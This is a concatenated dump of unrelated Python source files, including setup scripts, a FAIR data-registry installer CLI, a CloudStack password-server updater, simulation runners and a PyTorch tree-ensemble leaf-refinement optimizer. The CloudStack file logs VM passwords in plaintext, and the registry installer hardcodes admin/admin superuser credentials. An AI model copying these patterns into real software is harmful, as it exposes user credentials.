content
stringlengths 5
1.05M
|
---|
from django.apps import AppConfig
class ConnectionRequestsConfig(AppConfig):
name = 'v1.connection_requests'
|
from setuptools import find_packages, setup
with open("./README.rst") as f:
long_description = f.read()
requirements = []
setup(
name="rcv",
version="0.1.2",
description="Tabulate ballots from ranked-choice elections",
author="Max Hully",
author_email="[email protected]",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/gerrymandr/rcv",
packages=find_packages(exclude=("tests",)),
install_requires=requirements,
extras_require={
"test": ["pandas", "pytest", "pytest-cov"],
"sample": ["numpy >= 1.7"],
},
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
"License :: OSI Approved :: BSD License",
],
)
|
#!/usr/bin/env python3
import glob
import os
import pathlib
import shutil
import subprocess
import time
import typing
import venv
import click
import git
import requests
from fair.common import FAIR_FOLDER
FAIR_REGISTRY_REPO = "https://github.com/FAIRDataPipeline/data-registry.git"
def django_environ(environ: typing.Dict = os.environ):
_environ = environ.copy()
_environ["DJANGO_SETTINGS_MODULE"] = "drams.local-settings"
_environ["DJANGO_SUPERUSER_USERNAME"] = "admin"
_environ["DJANGO_SUPERUSER_PASSWORD"] = "admin"
return _environ
def rebuild_local(python: str, install_dir: str = None, silent: bool = False):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_migration_files = glob.glob(
os.path.join(install_dir, "*", "migrations", "*.py*")
)
for mf in _migration_files:
os.remove(mf)
_db_file = os.path.join(install_dir, "db.sqlite3")
if os.path.exists(_db_file):
os.remove(_db_file)
_manage = os.path.join(install_dir, "manage.py")
_sub_cmds = [
("makemigrations", "custom_user"),
("makemigrations", "data_management"),
("migrate",),
(
"graph_models",
"data_management",
"--arrow-shape",
"crow",
"-x",
'"BaseModel,DataObject,DataObjectVersion"',
"-E",
"-o",
os.path.join(install_dir, "schema.dot"),
),
("collectstatic", "--noinput"),
("createsuperuser", "--noinput"),
]
for sub in _sub_cmds:
subprocess.check_call(
[python, _manage, *sub],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
env=django_environ(),
)
if shutil.which("dot"):
subprocess.check_call(
[
shutil.which("dot"),
os.path.join(install_dir, "schema.dot"),
"-Tsvg",
"-o",
os.path.join(install_dir, "static", "images", "schema.svg"),
],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
def install_registry(
repository: str = FAIR_REGISTRY_REPO,
head: str = "main",
install_dir: str = None,
silent: bool = False,
force: bool = False,
venv_dir: str = None,
) -> None:
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
if force:
shutil.rmtree(install_dir, ignore_errors=True)
os.makedirs(os.path.dirname(install_dir), exist_ok=True)
_repo = git.Repo.clone_from(repository, install_dir)
if head not in _repo.heads:
raise FileNotFoundError(
f"No such HEAD '{head}' in registry repository"
)
else:
_repo.heads[head].checkout()
if not venv_dir:
venv_dir = os.path.join(install_dir, "venv")
venv.create(
venv_dir,
with_pip=True,
prompt="TestRegistry",
)
_venv_python = shutil.which("python", path=os.path.join(venv_dir, "bin"))
if not _venv_python:
raise FileNotFoundError(
f"Failed to find 'python' in location '{venv_dir}"
)
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "--upgrade", "pip", "wheel"],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "whitenoise"],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
_requirements = os.path.join(install_dir, "local-requirements.txt")
if not os.path.exists(_requirements):
raise FileNotFoundError(f"Expected file '{_requirements}'")
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "-r", _requirements],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
rebuild_local(_venv_python, install_dir, silent)
def refresh(
install_dir: str = None, silent: bool = False, venv_dir: str = None
):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_venv_dir = venv_dir or os.path.join(install_dir, "venv")
if not os.path.exists(_venv_dir):
raise FileNotFoundError(
f"Location '{install_dir}' is not a valid registry install"
)
_venv_python = shutil.which("python", path=os.path.join(_venv_dir, "bin"))
rebuild_local(_venv_python, install_dir, silent)
def launch(
install_dir: str = None,
port: int = 8000,
silent: bool = False,
venv_dir: str = None,
):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_venv_dir = venv_dir or os.path.join(install_dir, "venv")
if not os.path.exists(_venv_dir):
raise FileNotFoundError(
f"Location '{install_dir}' is not a valid registry install"
)
_manage = os.path.join(install_dir, "manage.py")
_venv_python = shutil.which("python", path=os.path.join(_venv_dir, "bin"))
with open(os.path.join(install_dir, "session_port.log"), "w") as out_f:
out_f.write(str(port))
with open(os.path.join(install_dir, "output.log"), "w") as out_f:
_process = subprocess.Popen(
[_venv_python, _manage, "runserver", str(port)],
stdout=out_f,
env=django_environ(),
stderr=subprocess.STDOUT,
shell=False,
)
_connection_time = 0
while _connection_time < 10:
try:
_req = requests.get(f"http://127.0.0.1:{port}/api")
break
except requests.exceptions.ConnectionError:
time.sleep(1)
_connection_time += 1
continue
if _connection_time == 10:
_log_text = open(os.path.join(install_dir, "output.log"))
raise requests.ConnectionError(f"Log reads:\n{_log_text.read()}")
if _req.status_code != 200:
raise requests.ConnectionError("Error starting local registry")
with open(os.path.join(install_dir, "token"), "w") as out_f:
subprocess.check_call(
[_venv_python, _manage, "get_token"],
stdout=out_f,
stderr=subprocess.STDOUT,
env=django_environ(),
shell=False,
)
if not os.path.exists(os.path.join(install_dir, "token")):
raise FileNotFoundError("Expected token file, but none created.")
if not silent:
click.echo(
"An access token for the REST API is available in the file"
f"'{os.path.join(install_dir, 'token')}'"
)
if not os.path.exists(os.path.join(install_dir, "token")):
raise AssertionError("Expected token file, but none created")
if not open(os.path.join(install_dir, "token")).read().strip():
raise AssertionError(
"Expected token in token file, but file empty"
)
if not shutil.which("dot") and not silent:
click.echo(
"WARNING: Graphviz is not installed, so provenance report images are not available"
)
return _process
def stop(install_dir: str = None, port: int = 8000, silent: bool = False):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_manage = os.path.join(install_dir, "manage.py")
subprocess.check_call(
["pgrep", "-f", f'"{_manage} runserver"', "|", "xargs", "kill"],
env=django_environ(),
shell=False,
)
try:
requests.get(f"http://127.0.0.1:{port}/api")
raise AssertionError("Expected registry termination")
except requests.ConnectionError:
pass
@click.group()
def fair_reg():
pass
@fair_reg.command(name="launch")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--port", help="Port to run registry on", default=8000)
@click.option("--silent/--normal", help="Run in silent mode", default=False)
def reg_launch(directory, port, silent):
launch(directory, port, silent)
@fair_reg.command(name="stop")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in silent mode", default=False)
def reg_stop(directory, silent):
stop(directory, silent)
@fair_reg.command(name="install")
@click.option(
"--repository",
default=FAIR_REGISTRY_REPO,
help="FAIR Data Registry Repository",
)
@click.option(
"--head",
default="main",
help="Head to use for checkout e.g. branch, tag etc.",
)
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in debug mode", default=False)
@click.option("--force/--no-force", help="Force re-install", default=False)
def reg_install(repository, head, directory, silent, force):
if force:
force = click.confirm(
f"Are you sure you want to remove directory '{directory}'?",
default=False,
)
install_registry(repository, head, directory, silent, force)
@fair_reg.command(name="refresh")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in debug mode", default=False)
def reg_refresh(directory, silent):
refresh(directory, silent)
if __name__ in "__main__":
fair_reg()
|
#!/usr/bin/python
# -- coding: utf-8 --
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import CsHelper
from CsProcess import CsProcess
from netaddr import IPNetwork, IPAddress
import logging
class CsPassword:
TOKEN_FILE="/tmp/passwdsrvrtoken"
def __init__(self, dbag):
self.dbag = dbag
self.process()
def process(self):
self.__update(self.dbag['ip_address'], self.dbag['password'])
def __update(self, vm_ip, password):
token = ""
try:
tokenFile = open(self.TOKEN_FILE)
token = tokenFile.read()
except IOError:
logging.debug("File %s does not exist" % self.TOKEN_FILE)
logging.debug("Got VM '%s' and password '%s'" % (vm_ip, password))
get_cidrs_cmd = "ip addr show | grep inet | grep -v secondary | awk '{print $2}'"
cidrs = CsHelper.execute(get_cidrs_cmd)
logging.debug("Found these CIDRs: %s" % cidrs)
for cidr in cidrs:
logging.debug("Processing CIDR '%s'" % cidr)
if IPAddress(vm_ip) in IPNetwork(cidr):
ip = cidr.split('/')[0]
logging.debug("Cidr %s matches vm ip address %s so adding passwd to passwd server at %s" % (cidr, vm_ip, ip))
proc = CsProcess(['/opt/cloud/bin/passwd_server_ip.py', ip])
if proc.find():
update_command = 'curl --header "DomU_Request: save_password" "http://{SERVER_IP}:8080/" -F "ip={VM_IP}" -F "password={PASSWORD}" ' \
'-F "token={TOKEN}" --interface 127.0.0.1 >/dev/null 2>/dev/null &'.format(SERVER_IP=ip, VM_IP=vm_ip, PASSWORD=password, TOKEN=token)
result = CsHelper.execute(update_command)
logging.debug("Update password server result ==> %s" % result)
else:
logging.debug("Update password server skipped because we didn't find a passwd server process for %s (makes sense on backup routers)" % ip)
|
from .opacities.linebyline import LineByLine
from .opacities.ck import CKTable
from .model.transmission import TransmissionRADTRANS
from .model.directimage import DirectImageRADTRANS
from .model.emission import EmissionRADTRANS |
# -*-coding:utf-8-*-
__author__ = "Allen Woo"
PLUGIN_NAME = "warehouse_plugin"
CONFIG = {
}
|
import numpy as np
# from pathos.multiprocessing import cpu_count
# from pathos.pools import ParallelPool as Pool
from multiprocessing import Pool,cpu_count
import libs.contact_inhibition_lib as lib #library for simulation routines
import libs.data as data
from structure.global_constants import *
import structure.initialisation as init
from structure.cell import Tissue, BasicSpringForceNoGrowth
import sys,os
import itertools
threshold_area_fraction = float(sys.argv[1])
death_to_birth_rate_ratio = float(sys.argv[2])
domain_size_multiplier = float(sys.argv[3])
b = float(sys.argv[4])
job_id = sys.argv[5]
NUMBER_SIMS = 10000
BATCH_SIZE = 1000
DELTA = 0.025
L = 10 # population size N=l*l
TIMEND = 80000. # simulation time (hours)
MAX_POP_SIZE = 1000
TIMESTEP = 96. # time intervals to save simulation history
DEATH_RATE = 0.25/24.
INIT_TIME = 96.
PARENTDIR = "CIP_pd_fix_N100/db%.2f_a%.1f/"%(death_to_birth_rate_ratio,threshold_area_fraction)
if not os.path.exists(PARENTDIR): # if the outdir doesn't exist create it
os.makedirs(PARENTDIR)
game_constants = (b,1.)
game = lib.prisoners_dilemma_averaged
simulation = lib.simulation_contact_inhibition_area_dependent
rates = (DEATH_RATE,DEATH_RATE/death_to_birth_rate_ratio)
with open(PARENTDIR+'info',"w") as f:
f.write('death_rate = %.6f\n'%DEATH_RATE)
f.write('initial pop size = %3d\n'%(L*L))
f.write('domain width = %.1f\n'%(L*domain_size_multiplier))
f.write('quiescent area ratio = %.1f'%threshold_area_fraction)
f.write('death to birth rate ratio = %.2f'%death_to_birth_rate_ratio)
f.write('timestep = %.1f'%TIMESTEP)
def fixed(history,i):
if 0 not in history[-1].properties['type']:
fix = 1
elif 1 not in history[-1].properties['type']:
fix = 0
else:
fix = -1
data.save_N_mutant(history,PARENTDIR+'/incomplete_b%.1f'%b,i)
return fix
def run_single_unpack(args):
return run_single(*args)
def run_single(i):
"""run a single voronoi tessellation model simulation"""
sys.stdout.flush()
rand = np.random.RandomState()
history = lib.run_simulation(simulation,L,TIMESTEP,TIMEND,rand,progress_on=False,
init_time=INIT_TIME,til_fix=True,save_areas=True,
return_events=False,save_cell_histories=False,N_limit=MAX_POP_SIZE,DELTA=DELTA,game=game,game_constants=game_constants,mutant_num=1,
domain_size_multiplier=domain_size_multiplier,rates=rates,threshold_area_fraction=threshold_area_fraction)
fixation = fixed(history,i)
with open(PARENTDIR+'b%.2f_%s_time'%(b,job_id),'a') as wfile:
wfile.write('%5d %5d %d\n'%(i,history[-1].time,fixation))
return fixation
def run_parallel():
pool = Pool(cpu_count()-1,maxtasksperchild=1000)
fixation = np.array([f for f in pool.imap(run_single,range(NUMBER_SIMS))])
with open(PARENTDIR+'b%.2f_%s'%(b,job_id),'w') as wfile:
if NUMBER_SIMS%BATCH_SIZE != 0:
batch_size=1
else:
batch_size = BATCH_SIZE
fixation = fixation.reshape((NUMBER_SIMS/batch_size,batch_size))
for fixation_batch in fixation:
fixed = len(np.where(fixation_batch==1)[0])
lost = len(np.where(fixation_batch==0)[0])
incomplete = len(np.where(fixation_batch==-1)[0])
wfile.write('%d %d %d\n'%(fixed,lost,incomplete))
run_parallel()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('h2/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
# Stealing this from Kenneth Reitz
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
packages = [
'h2',
]
readme = codecs.open('README.rst', encoding='utf-8').read()
history = codecs.open('HISTORY.rst', encoding='utf-8').read()
setup(
name='h2',
version=version,
description='HTTP/2 State-Machine based protocol implementation',
long_description=u'\n\n'.join([readme, history]),
author='Cory Benfield',
author_email='[email protected]',
url='http://hyper.rtfd.org',
packages=packages,
package_data={'': ['LICENSE', 'README.rst', 'CONTRIBUTORS.rst', 'HISTORY.rst', 'NOTICES']},
package_dir={'h2': 'h2'},
include_package_data=True,
license='MIT License',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
install_requires=[
'hyperframe>=5.1.0, <6',
'hpack>=2.3,<4',
],
extras_require={
':python_version == "2.7" or python_version == "3.3"': ['enum34>=1.1.6, <2'],
}
)
|
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.core.mail import EmailMessage
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from pettycash.models import PettycashBalanceCache, PettycashTransaction
from members.models import User
from moneyed import Money, EUR
import sys, os
import datetime
class Command(BaseCommand):
help = "Recache all balances"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run",
action="store_true",
dest="dryrun",
help="Do a dry-run; do not actually save.",
)
def handle(self, *args, **options):
rc = 0
verbosity = int(options["verbosity"])
for user in User.objects.all():
balance = PettycashBalanceCache(owner=user, balance=Money(0, EUR))
old_balance = Money(0, EUR)
act = "correction"
try:
balance = PettycashBalanceCache.objects.get(owner=user)
old_balance = balance.balance
except ObjectDoesNotExist as e:
act = "initial creation"
pass
balance.balance = Money(0, EUR)
trns = []
try:
trns = PettycashTransaction.objects.all().filter(
Q(dst=user) | Q(src=user)
)
for tx in trns:
if tx.dst == user:
balance.balance += tx.amount
else:
balance.balance -= tx.amount
except ObjectDoesNotExist as e:
pass
old_balance = old_balance - balance.balance
err = ""
if old_balance != Money(0, EUR) or act == "initial creation":
err = " (%s: %s)" % (act, old_balance)
if not options["dryrun"]:
balance._change_reason = act
balance.save()
if (err != "" and act != "initial creation") or verbosity > 1:
print("%s: %s%s" % (user, balance.balance, err))
sys.exit(rc)
|
__all__ = ['logger', 'testoptions', 'testutil']
# fix import paths first so that the right (dev) version of pygr is imported
import pathfix
# import rest of test utils.
import testoptions
import testutil
# make SkipTest available
from unittest_extensions import SkipTest, PygrTestProgram
|
DEFAULT_INTERVAL = 3600 # 1 hour
|
import numpy as np
import csv
import logging
logger = logging.getLogger(__name__)
### generate submission.csv
def output_submission(path,playlist,rec_uris,Warn=True):
pid = playlist['pid']
num_recs = len(rec_uris)
if Warn and (num_recs != 500):
logger.warning("Playlist {0} got {1}/500 recs.".format(pid,num_recs))
with open(path+"submission.csv",'a') as submission:
sub_wrtr = csv.writer(submission, delimiter=',')
sub_wrtr.writerow([pid] + rec_uris)
### generate extra_info.csv with more information
def output_extra(path,playlist,rec_uris,t2a,u2t,u2a,perf_stats,
for_test_set=False,stats_only=False):
with open(path+"perf_stats.csv",'a') as perf:
perf_wrtr = csv.writer(perf, delimiter=';')
perf_wrtr.writerow([playlist['pid'],str(perf_stats)])
if stats_only: return
pid = playlist['pid']
try: name = playlist['name']
except: name = 'N/A'
num_seeds = playlist['num_samples']
num_anss = playlist['num_tracks'] - num_seeds
with open(path+"{0}.csv".format(pid),'w') as extra:
# Write basic info
extra_wrtr = csv.writer(extra, delimiter=',')
extra_wrtr.writerow(["------------------------------"])
extra_wrtr.writerow([str(pid), name.encode('utf-8')])
if for_test_set:
extra_wrtr.writerow(['perf_stats:',str(perf_stats)])
# Write seeds
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Seeds: ({0})".format(num_seeds)])
for track in playlist['tracks']:
track_name = track['track_name'].encode('utf-8')
artist_name = track['artist_name'].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
# Write answers (test_set only)
if for_test_set:
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Answers: ({0})".format(num_anss)])
for track in playlist['answers']:
track_name = track['track_name'].encode('utf-8')
artist_name = track['artist_name'].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
# Write recommendations
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Recommendations: ({0})".format(len(rec_uris))])
rec_a_uris = [ t2a[t_uri] for t_uri in rec_uris ]
for track_uri, artist_uri in zip(rec_uris, rec_a_uris):
track_name = u2t[track_uri].encode('utf-8')
artist_name = u2a[artist_uri].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
extra_wrtr.writerow(["End of playlist {0}".format(pid)])
extra_wrtr.writerow(["------------------------------"])
|
from multiprocessing.sharedctypes import Value
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
from tqdm import tqdm
from fastinference.models import Ensemble, Tree
import torch
import torch.nn as nn
def create_mini_batches(inputs, targets, batch_size, shuffle=False):
""" Create an mini-batch like iterator for the given inputs / target / data. Shamelessly copied from https://stackoverflow.com/questions/38157972/how-to-implement-mini-batch-gradient-descent-in-python
Parameters
----------
inputs : array-like vector or matrix
The inputs to be iterated in mini batches
targets : array-like vector or matrix
The targets to be iterated in mini batches
batch_size : int
The mini batch size
shuffle : bool, default False
If True shuffle the batches
"""
assert inputs.shape[0] == targets.shape[0]
indices = np.arange(inputs.shape[0])
if shuffle:
np.random.shuffle(indices)
start_idx = 0
while start_idx < len(indices):
if start_idx + batch_size > len(indices) - 1:
excerpt = indices[start_idx:]
else:
excerpt = indices[start_idx:start_idx + batch_size]
start_idx += batch_size
yield inputs[excerpt], targets[excerpt]
def apply(tree, mapping, X):
"""Applies the given tree to the given data by using the provided leaf-node mapping. To do so traverse the tree as usual and extracts the relevant leaf node indices
Args:
tree (Tree): The tree that should be applied
mapping (dict): The mapping of leaf node indices (e.g. node.id) and their counterpart in the leaf array used by SGD
X (2d np.array): The data matrix
Returns:
np.array: (N,) numpy array with the leaf index for each data item
"""
if len(X.shape) == 1:
X = X.reshape(1,X.shape[0])
ids = []
for x in X:
node = tree.head
while(node.prediction is None):
if (x[node.feature] <= node.split):
node = node.leftChild
else:
node = node.rightChild
ids.append(mapping[node.id])
return np.array(ids)
class LeafRefinery(nn.Module):
def __init__(self, epochs, lr, batch_size, optimizer, verbose,loss_function = "mse", loss_type = "upper", l_reg = 1.0):
super().__init__()
assert loss_function in ["mse", "nll", "cross-entropy"], "LeafRefinery only supports the {{mse, nll, cross-entropy}} loss but you gave {}".format(loss_function)
assert lr >= 0, "Learning rate must be positive, but you gave {}".format(lr)
assert epochs >= 1, "Number of epochs must be >= 1, but you gave {}".format(epochs)
assert optimizer in ["sgd", "adam"], "The optimizer must be from {{adam, sgd}}, but you gave {}".format(optimizer)
if loss_type == "exact":
assert 0 <= l_reg <= 1, "You set loss_type to exact. In this case l_reg should be from [0,1], but you supplied l_reg = {}".format(l_reg)
self.epochs = epochs
self.lr = lr
self.batch_size = batch_size
self.optimizer = optimizer
self.verbose = verbose
self.loss_function = loss_function
self.loss_type = loss_type
self.l_reg = l_reg
def _loss(self, pred, target):
if self.loss_function == "mse":
target_one_hot = torch.nn.functional.one_hot(target, num_classes = pred.shape[1]).double()
return torch.nn.functional.mse_loss(pred, target_one_hot)
elif self.loss_function == "nll":
return torch.nn.functional.nll_loss(pred, target)
elif self.loss_function == "cross-entropy":
return torch.nn.functional.cross_entropy(pred, target)
else:
raise ValueError("Unknown loss function set in LeafRefinery")
def compute_loss(self, fbar, base_preds, target):
if self.loss_type == "upper":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
D = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
else:
if self.loss_function == "mse":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
eye_matrix = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
D = 2.0*eye_matrix
elif self.loss_function == "nll":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
D = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
target_one_hot = torch.nn.functional.one_hot(target, num_classes = n_classes)
eps = 1e-7
diag_vector = target_one_hot*(1.0/(fbar**2+eps))
D.diagonal(dim1=-2, dim2=-1).copy_(diag_vector)
elif self.loss_function == "cross-entropy":
n_preds = fbar.shape[0]
n_classes = fbar.shape[1]
f_bar_softmax = nn.functional.softmax(fbar,dim=1)
D = -1.0*torch.bmm(f_bar_softmax.unsqueeze(2), f_bar_softmax.unsqueeze(1)).double()
diag_vector = f_bar_softmax*(1.0-f_bar_softmax)
D.diagonal(dim1=-2, dim2=-1).copy_(diag_vector)
else:
# NOTE: We should never reach this code path
raise ValueError("Invalid combination of mode and loss function in Leaf-refinement.")
f_loss = self._loss(fbar, target)
losses = []
n_estimators = len(base_preds)
for pred in base_preds:
diff = pred - fbar
covar = torch.bmm(diff.unsqueeze(1), torch.bmm(D, diff.unsqueeze(2))).squeeze()
div = 1.0/n_estimators * 1.0/2.0 * covar
i_loss = self._loss(pred, target)
if self.loss_type == "exact":
# Eq. (4)
reg_loss = 1.0/n_estimators * i_loss - self.l_reg * div
else:
# Eq. (5) where we scale the ensemble loss with 1.0/self.n_estimators due to the summation later
reg_loss = 1.0/n_estimators * self.l_reg * f_loss + (1.0 - self.l_reg)/n_estimators * i_loss
losses.append(reg_loss)
return torch.stack(losses).sum()
def refine(self, weights, trees, X, Y):
"""Performs SGD using the MSE loss over the leaf nodes of the given trees on the given data. The weights of each tree are respected during optimization but not optimized.
Args:
weights (np.array): The weights of the trees.
trees (list of Tree): The trees.
X (2d np.array): The data.
Y (np.array): The targe.
epochs (int): The number of epochs SGD is performed.
lr (float): The learning rate of SGD.
batch_size (int): The batch size of SGD
optimizer (str): The optimizer used for optimization. Can be {{"sgd", "adam"}}.
verbose (bool): If True outputs the loss during optimization.
Returns:
list of trees: The refined trees.
"""
if self.batch_size > X.shape[0]:
if self.verbose:
print("WARNING: The batch size for SGD is larger than the dataset supplied: batch_size = {} > X.shape[0] = {}. Using batch_size = X.shape[0]".format(self.batch_size, X.shape[0]))
self.batch_size = X.shape[0]
# To make the following SGD somewhat efficient this code extracts all the leaf nodes and gathers them in an array. To do so it iterates over all trees and all nodes in the trees. Each leaf node is added to the leafs array and the corresponding node.id is stored in mappings. For scikit-learn trees this would be much simpler as they already offer a dedicated leaf field:
# leafs = []
# for tree in trees:
# tmp = tree.tree_.value / tree.tree_.value.sum(axis=(1,2))[:,np.newaxis,np.newaxis]
# leafs.append(tmp.squeeze(1))
mappings = []
leafs = []
for t, w in zip(trees, weights):
leaf_mapping = {}
l = []
for i, n in enumerate(t.nodes):
if n.prediction is not None:
leaf_mapping[n.id] = len(l)
# Normalize the values in the leaf nodes for SGD. This is usually a better initialization
pred = np.array(n.prediction) / sum(n.prediction)
l.append(pred)
mappings.append(leaf_mapping)
leafs.append(np.array(l))
self.leafs = nn.ParameterList([ nn.Parameter(torch.from_numpy(l)) for l in leafs])
# Train the model
if self.optimizer == "adam":
optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
else:
optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)
for epoch in range(self.epochs):
mini_batches = create_mini_batches(X, Y, self.batch_size, True)
batch_cnt = 0
loss_sum = 0
accuracy_sum = 0
with tqdm(total=X.shape[0], ncols=150, disable = not self.verbose) as pbar:
for x,y in mini_batches:
# Prepare the target and apply all trees
indices = [apply(t, m, x) for t,m in zip(trees, mappings)]
pred = []
for i, idx, w in zip(range(len(trees)), indices, weights):
pred.append(w * self.leafs[i][idx,:])
fbar = torch.stack(pred).mean(axis=0)
# Do the actual optimization
loss = self.compute_loss(fbar, pred, torch.tensor(y))
optimizer.zero_grad()
loss.backward()
optimizer.step()
# compute some statistics
loss_sum += loss.detach().numpy()
accuracy_sum += accuracy_score(fbar.argmax(axis=1),y) * 100.0
batch_cnt += 1
pbar.update(x.shape[0])
desc = '[{}/{}] loss {:2.4f} accuracy {:2.4f}'.format(
epoch,
self.epochs-1,
loss_sum / batch_cnt,
accuracy_sum / batch_cnt,
)
pbar.set_description(desc)
# Copy the optimized leafs back into the trees with the pre-computed mapping
for t, m, l in zip(trees, mappings, self.leafs):
for nid, i in m.items():
t.nodes[nid].prediction = l[i].detach().numpy().tolist()
return trees
def optimize(model, X = None, Y = None, file = "", epochs = 5, lr = 1e-1, batch_size = 32, optimizer = "adam", verbose = False, loss_function = "mse", loss_type = "upper", l_reg = 1.0, **kwargs):
"""Performs leaf refinement in the given tree ensemble with PyTorch. Leaf-refinement refines the probability estimates in the leaf nodes of each tree by optimizing the NCL loss function using SGD. This implementation uses PyTorch to compute the gradient of the loss function and is thereby a little more flexible. Its main purpose is to facilitate easy development of new refinement methods.
For refinement either :code:`X` / :code:`Y` must be provided or :code:`file` must point to a CSV file which has a "y" column. All remaining columns are interpreted as features. If both are provided then :code:`X` / :code:`Y` is used before the file. If none are provided an error is thrown.
You can activate this optimization by simply passing :code:`"leaf-refinement-pytorch"` to the optimizer, e.g.
.. code-block::
loaded_model = fastinference.Loader.model_from_file("/my/nice/tree.json")
loaded_model.optimize("leaf-refinement", {"X": some_data, "Y" : some_targets})
Reference:
Buschjäger, Sebastian, and Morik, Katharina "There is no Double-Descent in Random Forests" 2021 (https://arxiv.org/abs/2111.04409)
Buschjäger, Sebastian, Pfahler, Lukas, and Morik, Katharina "Generalized Negative Correlation Learning for Deep Ensembling" 2020 (https://arxiv.org/pdf/2011.02952.pdf)
Args:
model (Ensemble of Trees or Tree): The Tree or Ensemble of Trees that should be refined
X (2d np.array, optional): A (N,d) data matrix used for refinement. Defaults to None.
Y (np.array, optional): A (N,) target vector used for refinement. Defaults to None.
file (str, optional): Path to a CSV file from which X/Y is loaded if these are not provided. If set, the CSV must contain a "y" column to properly load Y. All remaining columns are interpreted as features. Defaults to "".
epochs (int, optional): Number of epochs used for SGD/ADAM. Defaults to 5.
lr (float, optional): Learning rate used for SGD/ADAM. Defaults to 1e-1.
batch_size (int, optional): Batch size used for SGD/ADAM. Defaults to 32.
optimizer (str, optional): Optimizer for optimization. Can be {{"sgd", "adam"}}. Defaults to "adam".
verbose (bool, optional): If True outputs the loss during optimization. Defaults to False.
loss_function (str, optional): The loss to be optimized. Can be {{"mse","nll","cross-entropy"}}. Defaults to "mse"
loss_type (str, optional): The way the loss is interpreted which influences the interpretation of the l_reg parameter. Can be {{"upper", "exact"}}. Defaults to "upper".
l_reg (float, optional): The regularizer. If loss_type = "upper" is set then l_reg should be [0,1], where 0 indicates independent refinement of the trees and 1 the joint optimization of all trees. A value in-between is a mix of both approaches. If loss_type = "exact" you can freely choose l_reg, where l_reg < 0 actively discourages diversity across the trees, l_reg = 0 ignores it and l_reg > 1 promotes it. Defaults to 1.0
Returns:
Ensemble of Trees or Tree: The refined ensemble / tree
"""
assert (X is not None and Y is not None) or file.endswith(".csv"), "You can either supply (X,y) directly or use `file' to supply a csv file that contains the data. You did not provide either. Please do so."
assert isinstance(model, (Tree.Tree, Ensemble.Ensemble)), "Leaf refinement does only work with Tree Ensembles or single trees, but you provided {}".format(model.__class__.__name__)
assert lr >= 0, "Learning rate must be positive, but you gave {}".format(lr)
assert epochs >= 1, "Number of epochs must be >= 1, but you gave {}".format(epochs)
assert optimizer in ["sgd", "adam"], "The optimizer must be from {{adam, sgd}}, but you gave {}".format(optimizer)
